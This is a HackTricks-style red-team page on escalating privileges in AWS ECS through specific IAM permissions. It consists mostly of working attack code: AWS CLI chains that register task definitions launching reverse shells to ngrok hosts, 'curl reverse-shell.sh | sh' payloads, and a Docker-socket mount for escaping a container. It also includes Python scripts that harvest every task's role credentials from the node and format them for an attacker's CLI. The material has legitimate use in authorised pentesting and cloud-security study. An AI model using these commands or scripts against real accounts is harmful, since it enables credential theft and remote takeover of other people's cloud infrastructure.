AWS - ECS Privesc


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECS

More information about ECS in:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can register a new task definition that runs a malicious container with a task role of their choice and then launch it. Inside the container the role's temporary credentials are served by the task metadata endpoint (169.254.170.2 plus the path in AWS_CONTAINER_CREDENTIALS_RELATIVE_URI), so a reverse shell is enough to steal them. Two conditions apply: iam:PassRole must cover the target role ARN (check for iam:PassedToService conditions), and the role's trust policy must allow ecs-tasks.amazonaws.com to assume it, since ECS tasks can only use roles that trust that service principal.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition (Fargate needs a subnet for the task ENI; a public IP lets the shell reach ngrok)
aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Inside the reverse shell, the task role's keys are returned by:
#   curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```

Potential Impact: Direct privesc to a different ECS role.
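Before registering anything it is worth knowing which roles the chain above can actually land on. The following Python is an added example (it is not code from the HackTricks page): it evaluates iam:PassRole for a set of candidate roles against a constructed identity policy, honouring IAM wildcards, an explicit Deny and an iam:PassedToService condition, and then checks each role's trust policy for ecs-tasks.amazonaws.com, because a role you are allowed to pass but that ECS tasks cannot assume is useless as a task role. Every policy document, role name and account ID is made-up sample data; in an engagement you would feed in the documents returned by the IAM API.

```python
"""Added example (not from the HackTricks page): which roles can this principal
actually land on through iam:PassRole + ecs:RegisterTaskDefinition + ecs:RunTask?

Two checks must both pass: the identity policy allows iam:PassRole for the role
ARN (IAM globs '*' / '?', explicit Deny wins, optional iam:PassedToService
condition), and the role's trust policy lets ecs-tasks.amazonaws.com assume it.
Every policy document and ARN below is constructed sample data.
"""
import json
import re

ECS_TASKS_SERVICE = "ecs-tasks.amazonaws.com"


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _iam_match(pattern, value):
    """IAM-style glob: '*' matches any run of characters, '?' exactly one."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value) is not None


def _statement_covers(stmt, action, resource, service):
    """Does this statement's Action/Resource/Condition apply to the PassRole call?"""
    if not any(_iam_match(a, action) for a in _as_list(stmt.get("Action"))):
        return False
    if not any(_iam_match(r, resource) for r in _as_list(stmt.get("Resource"))):
        return False
    # Only the iam:PassedToService condition key is modelled; others are ignored.
    for operator in ("StringEquals", "StringLike"):
        for key, values in stmt.get("Condition", {}).get(operator, {}).items():
            if key.lower() == "iam:passedtoservice" and not any(
                _iam_match(v, service) for v in _as_list(values)
            ):
                return False
    return True


def passrole_allowed(identity_policy, role_arn, service=ECS_TASKS_SERVICE):
    """Evaluate iam:PassRole for one role ARN; an explicit Deny beats any Allow."""
    allowed = False
    for stmt in _as_list(identity_policy.get("Statement")):
        if not _statement_covers(stmt, "iam:PassRole", role_arn, service):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        allowed = allowed or stmt.get("Effect") == "Allow"
    return allowed


def ecs_can_assume(trust_policy):
    """True when an Allow statement lets ecs-tasks.amazonaws.com call sts:AssumeRole."""
    for stmt in _as_list(trust_policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not any(_iam_match(a, "sts:AssumeRole") for a in _as_list(stmt.get("Action"))):
            continue
        principal = stmt.get("Principal")
        if principal == "*":
            return True
        if isinstance(principal, dict) and ECS_TASKS_SERVICE in _as_list(principal.get("Service")):
            return True
    return False


def passable_ecs_roles(identity_policy, roles):
    """roles: {role_arn: trust_policy}. Returns ARNs usable as a malicious task role."""
    return sorted(arn for arn, trust in roles.items()
                  if passrole_allowed(identity_policy, arn) and ecs_can_assume(trust))


# --- constructed sample data -------------------------------------------------
ECS_TRUST = {"Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                            "Principal": {"Service": "ecs-tasks.amazonaws.com"}}]}
EC2_TRUST = {"Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
                            "Principal": {"Service": "ec2.amazonaws.com"}}]}
ATTACKER_POLICY = {"Statement": [
    {"Effect": "Allow", "Action": ["ecs:RegisterTaskDefinition", "ecs:RunTask"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "arn:aws:iam::123456789012:role/ecs-*",
     "Condition": {"StringEquals": {"iam:PassedToService": "ecs-tasks.amazonaws.com"}}},
    {"Effect": "Deny", "Action": "iam:PassRole", "Resource": "arn:aws:iam::123456789012:role/ecs-admin-task"},
]}
CANDIDATE_ROLES = {
    "arn:aws:iam::123456789012:role/ecs-app-task": ECS_TRUST,        # passable and assumable
    "arn:aws:iam::123456789012:role/ecs-admin-task": ECS_TRUST,      # blocked by the explicit Deny
    "arn:aws:iam::123456789012:role/ecs-instance-role": EC2_TRUST,   # passable, but ECS tasks cannot assume it
    "arn:aws:iam::123456789012:role/lambda-worker": ECS_TRUST,       # outside the PassRole resource pattern
}

if __name__ == "__main__":
    print(json.dumps(passable_ecs_roles(ATTACKER_POLICY, CANDIDATE_ROLES), indent=2))
```

Only ecs-app-task survives both filters in the sample: ecs-admin-task is hit by the Deny, ecs-instance-role is passable but trusts only EC2, and lambda-worker falls outside the resource pattern. Other condition keys (source IP, MFA, tags) are deliberately not modelled here; when a policy carries them, test the pass with a real `run-task` in a throwaway cluster rather than trusting the static check.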

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials and run it.
However, StartTask places the task on a specific container instance, so in this case the cluster must have registered EC2 container instances; StartTask does not work with Fargate.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Place the task on a chosen EC2 container instance of the cluster
# (awsvpc network mode still needs a subnet for the task ENI; public IPs are not assignable on EC2)
aws ecs start-task --task-definition iam_exfiltration \
  --cluster "$CLUSTER_ARN" \
  --container-instances <instance_id> \
  --network-configuration "{\"awsvpcConfiguration\":{\"subnets\":[\"<subnet-id>\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```

Potential Impact: Direct privesc to any ECS role.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

As in the previous examples, an attacker abusing iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService in ECS can register a new task definition with a malicious container that steals the metadata credentials, and run it either by creating a new service with at least one desired task or by pointing an existing service at the new task definition. Because the task role lives in the task definition, the service's tasks start with whatever role the attacker passed. Note that a service keeps replacing tasks that exit, so a dropped reverse shell is relaunched until the service is deleted or scaled to zero, which is noisy but also convenient.

```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
  --task-role-arn "$ECS_ROLE_ARN" \
  --network-mode "awsvpc" \
  --cpu 256 --memory 512 \
  --requires-compatibilities "[\"FARGATE\"]" \
  --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
  --task-definition iam_exfiltration \
  --desired-count 1 \
  --cluster "$CLUSTER_ARN" \
  --launch-type FARGATE \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service (triggers a new deployment with the attacker's task definition)
aws ecs update-service --cluster <CLUSTER NAME> \
  --service <SERVICE NAME> \
  --task-definition <NEW TASK DEFINITION NAME>
```

Potential Impact: Direct privesc to any ECS role.

iam:PassRole, (ecs:RunTask|ecs:StartTask)

ecs:RegisterTaskDefinition is not strictly needed. The overrides parameter of RunTask (StartTask accepts the same overrides) lets an attacker swap both the task role and the container command of an existing task definition at launch time, so with just iam:PassRole and one of those launch permissions arbitrary commands can be executed in a container running with any passable role, with something like:

```bash
# Reuse an existing task definition; the overrides replace its task role and the
# container's command only for this launch (no new task definition is registered)
aws ecs run-task \
  --task-definition "<task-name>" \
  --overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
  --cluster <cluster-name> \
  --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-id>\"]}}"
```

Potential Impact: Direct privesc to any ECS role.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

This scenario is like the previous ones but without the iam:PassRole permission.
It is still interesting because if you can run an arbitrary container, even one without a task role, you can run a privileged container (or mount the host's Docker socket, as below) to escape to the node and steal the EC2 instance role from IMDS (169.254.169.254) together with the task roles of the other ECS containers running on that node: the ECS agent hands every task its credentials through 169.254.170.2, and from the host the per-task AWS_CONTAINER_CREDENTIALS_RELATIVE_URI can be read out of each container's environment.
You could even force other tasks to run on the compromised EC2 instance to steal their credentials (as discussed in the Privesc to node section).

warning

This attack is only possible if the ECS cluster uses EC2 instances and not Fargate (Fargate tasks cannot be privileged or mount host paths).

```bash
# Container definition: mount the host's Docker socket into the reverse-shell container.
# Alternative to the socket mount: set "privileged": true in the container definition (EC2 launch type only)
printf '[
  {
    "name": "exfil_creds",
    "image": "python:latest",
    "entryPoint": ["sh", "-c"],
    "command": ["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
    "mountPoints": [
      {
        "readOnly": false,
        "containerPath": "/var/run/docker.sock",
        "sourceVolume": "docker-socket"
      }
    ]
  }
]' > /tmp/task.json

# Host volume backing the mount point above
printf '[
  {
    "name": "docker-socket",
    "host": {
      "sourcePath": "/var/run/docker.sock"
    }
  }
]' > /tmp/volumes.json

aws ecs register-task-definition --family iam_exfiltration \
  --cpu 256 --memory 512 \
  --requires-compatibilities '["EC2"]' \
  --container-definitions file:///tmp/task.json \
  --volumes file:///tmp/volumes.json

aws ecs run-task --task-definition iam_exfiltration \
  --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
  --launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
```
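Once the reverse shell above has the Docker client talking to the mounted socket, the task roles of every other container on the node can be collected without touching any ECS API. The following Python is an added example (not code from the HackTricks page): it reads AWS_CONTAINER_CREDENTIALS_RELATIVE_URI out of `docker inspect` output for each container, requests the matching credentials from the agent's endpoint at 169.254.170.2 (which keys them only by the UUID in the path), and renders them as export lines for the attacker's own AWS CLI. The inspect output and the credentials JSON embedded below are constructed samples; the container names, UUID and account ID are made up, and the access key values are AWS's documented placeholder examples.

```python
"""Added example (not from the HackTricks page): harvest every task role on a
compromised ECS container instance.

The ECS agent injects AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/<uuid>
into each task container and serves the matching role credentials from
169.254.170.2, keyed only by that UUID.  With access to the Docker socket on the
node you can read the variable from every container and request each task's keys.
The `docker inspect` output and the credentials JSON below are constructed samples;
fetch_credentials()/inspect_all_containers() are the only parts that touch the node.
"""
import json
import subprocess
import urllib.request

CREDS_ENDPOINT = "http://169.254.170.2"   # task credentials; the instance role lives on IMDS instead
CREDS_VAR = "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"


def credential_uris(inspect_output):
    """Map container name -> relative credentials URI for every ECS task container."""
    found = {}
    for container in inspect_output:
        for entry in (container.get("Config", {}).get("Env") or []):
            key, sep, value = entry.partition("=")
            if sep and key == CREDS_VAR:
                found[container["Name"].lstrip("/")] = value
    return found


def to_exports(creds):
    """Render the endpoint's JSON as export lines for the attacker's AWS CLI."""
    return "\n".join([
        f"# {creds.get('RoleArn', 'unknown role')} (expires {creds.get('Expiration', '?')})",
        f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
        f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
        f"export AWS_SESSION_TOKEN={creds['Token']}",
    ])


def fetch_credentials(relative_uri, endpoint=CREDS_ENDPOINT):
    """GET one task's role credentials (network call, run it on the node)."""
    with urllib.request.urlopen(endpoint + relative_uri, timeout=3) as resp:
        return json.load(resp)


def inspect_all_containers():
    """`docker inspect` for every running container (needs /var/run/docker.sock)."""
    ids = subprocess.check_output(["docker", "ps", "-q"], text=True).split()
    return json.loads(subprocess.check_output(["docker", "inspect", *ids], text=True)) if ids else []


# --- constructed sample data -------------------------------------------------
SAMPLE_INSPECT = [
    {"Name": "/ecs-app-task-7-app-c2e4a6b8d0f1",
     "Config": {"Env": ["PATH=/usr/local/bin:/usr/bin:/bin",
                        "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/3f6b9a2e-1c4d-4e8f-9a0b-7d2c5e1f8a3b",
                        "AWS_DEFAULT_REGION=us-east-1"]}},
    {"Name": "/ecs-agent",                      # the agent itself carries no task credentials
     "Config": {"Env": ["ECS_CLUSTER=prod", "ECS_DATADIR=/data"]}},
]
SAMPLE_CREDS = {  # shape of the 169.254.170.2 response; values are AWS's documented examples
    "RoleArn": "arn:aws:iam::123456789012:role/ecs-app-task",
    "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "Token": "IQoJb3JpZ2luX2VjEXAMPLETOKEN",
    "Expiration": "2030-01-01T00:00:00Z",
}

if __name__ == "__main__":
    for name, uri in credential_uris(inspect_all_containers()).items():
        print(f"# container {name}\n{to_exports(fetch_credentials(uri))}\n")
```

Run it from the reverse shell after installing the Docker client as the comment above notes. The instance role is separate: it comes from IMDS at 169.254.169.254, which a bridge-networked container can only reach over IMDSv2 if the instance's hop limit is at least 2 (or from the host itself once you have escaped).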

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to it (the describe permission is needed because aws ecs execute-command calls DescribeTasks first to locate the container).
However, this only works if the task was launched with execute command enabled, so that the ExecuteCommandAgent is running inside the container (it isn't by default). The flag cannot be switched on for a task that is already running, and the attacker's machine needs the Session Manager plugin installed.

Therefore, an attacker can try to:

  • Try to execute commands in every running container

```bash
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq -r '.clusterArns[]'); do
  echo "Cluster $cluster"
  for task in $(aws ecs list-tasks --cluster "$cluster" | jq -r '.taskArns[]'); do
    echo "  Task $task"
    # If true, it's your lucky day
    aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
  done
done

# Execute a shell in a container (add --container <name> if the task has more than one)
aws ecs execute-command --interactive \
  --command "sh" \
  --cluster "$CLUSTER_ARN" \
  --task "$TASK_ARN"
```
  • If they have ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]
  • If they have ecs:StartTask, run a task with aws ecs start-task --enable-execute-command [...]
  • If they have ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]
  • If they have ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...] (only the tasks of the new deployment get the agent)

You can find examples of those options in the previous ECS privesc sections.

Potential Impact: Privesc to a different role attached to containers.
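The grep in the loop above only tells you whether enableExecuteCommand was set; it does not tell you whether execute-command will connect. The following Python is an added example (not code from the HackTricks page) that applies the full readiness check to describe-tasks output: the task must be RUNNING and the container you target must show an ExecuteCommandAgent managed agent whose own lastStatus is RUNNING (it sits in PENDING or STOPPED when the task role lacks the ssmmessages permissions the agent needs). The describe-tasks response embedded below is a constructed sample in the shape of the CLI output; the cluster name and task ARNs are made up.

```python
"""Added example (not from the HackTricks page): find the tasks where
`aws ecs execute-command` will really connect, from `describe-tasks` JSON.

enableExecuteCommand alone is not enough: the task must be RUNNING and the
container you target must show an ExecuteCommandAgent managed agent with
lastStatus RUNNING (it sits in PENDING/STOPPED when the task role lacks the
ssmmessages:* permissions the agent needs).  The response below is a constructed
sample in the shape of the CLI output; cluster and task ARNs are made up.
"""

EXEC_AGENT = "ExecuteCommandAgent"


def exec_ready_containers(describe_tasks_output):
    """Return (taskArn, containerName) pairs that pass every readiness condition."""
    ready = []
    for task in describe_tasks_output.get("tasks", []):
        if not task.get("enableExecuteCommand") or task.get("lastStatus") != "RUNNING":
            continue
        for container in task.get("containers", []):
            agents = container.get("managedAgents", [])
            if any(a.get("name") == EXEC_AGENT and a.get("lastStatus") == "RUNNING" for a in agents):
                ready.append((task["taskArn"], container["name"]))
    return ready


def execute_command_cli(cluster, task_arn, container, command="sh"):
    """Build the CLI call; --container is mandatory once a task has more than one container.
    The local machine also needs the Session Manager plugin installed."""
    return ["aws", "ecs", "execute-command", "--interactive", "--cluster", cluster,
            "--task", task_arn, "--container", container, "--command", command]


# --- constructed sample data -------------------------------------------------
SAMPLE_DESCRIBE_TASKS = {"tasks": [
    {   # exec enabled, task running; agent up in "app", stopped in "sidecar"
        "taskArn": "arn:aws:ecs:us-east-1:123456789012:task/prod/1111aaaa",
        "lastStatus": "RUNNING", "enableExecuteCommand": True,
        "containers": [
            {"name": "app", "managedAgents": [{"name": EXEC_AGENT, "lastStatus": "RUNNING"}]},
            {"name": "sidecar", "managedAgents": [{"name": EXEC_AGENT, "lastStatus": "STOPPED"}]},
        ],
    },
    {   # exec never enabled: no managed agents are even reported
        "taskArn": "arn:aws:ecs:us-east-1:123456789012:task/prod/2222bbbb",
        "lastStatus": "RUNNING", "enableExecuteCommand": False,
        "containers": [{"name": "web"}],
    },
    {   # exec enabled but the task has not reached RUNNING yet
        "taskArn": "arn:aws:ecs:us-east-1:123456789012:task/prod/3333cccc",
        "lastStatus": "PENDING", "enableExecuteCommand": True,
        "containers": [{"name": "job", "managedAgents": [{"name": EXEC_AGENT, "lastStatus": "PENDING"}]}],
    },
]}

if __name__ == "__main__":
    for task_arn, container in exec_ready_containers(SAMPLE_DESCRIBE_TASKS):
        print(" ".join(execute_command_cli("prod", task_arn, container)))
```

Feed it the JSON from `aws ecs describe-tasks --cluster <cluster> --tasks <arn> [<arn> ...]` (up to 100 ARNs per call, which is faster than the one-task-per-call loop above). In the sample only the app container of the first task qualifies; the sidecar's stopped agent and the pending task would both fail with a TargetNotConnectedException even though enableExecuteCommand reads true for them.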

ssm:StartSession

Check in the ssm privesc page how you can abuse this permission to privesc to ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Check in the ec2 privesc page how you can abuse these permissions to privesc to ECS:

AWS - EC2 Privesc

?ecs:RegisterContainerInstance

TODO: Is it possible to register an instance from a different AWS account so that tasks get scheduled onto machines controlled by the attacker?

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

note

TODO: Test this

An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions could create a malicious task set for an existing ECS service and make it the service's primary task set, getting arbitrary code executed inside that service. Two caveats: CreateTaskSet only applies to services that use the EXTERNAL deployment controller, and the example below also needs ecs:RegisterTaskDefinition (and iam:PassRole if the new task definition is to carry a task role; without it the gain is code execution in the service's network position rather than a new IAM role).

```bash
# Register a task definition with a reverse shell
echo '{
  "family": "malicious-task",
  "containerDefinitions": [
    {
      "name": "malicious-container",
      "image": "alpine",
      "command": [
        "sh",
        "-c",
        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
      ]
    }
  ]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
# (only valid for services using the EXTERNAL deployment controller)
aws ecs create-task-set --cluster existing-cluster --service existing-service \
  --task-definition malicious-task \
  --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service \
  --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
```

Potential Impact: Execute arbitrary code in the affected service, which could disrupt it or leak sensitive data.

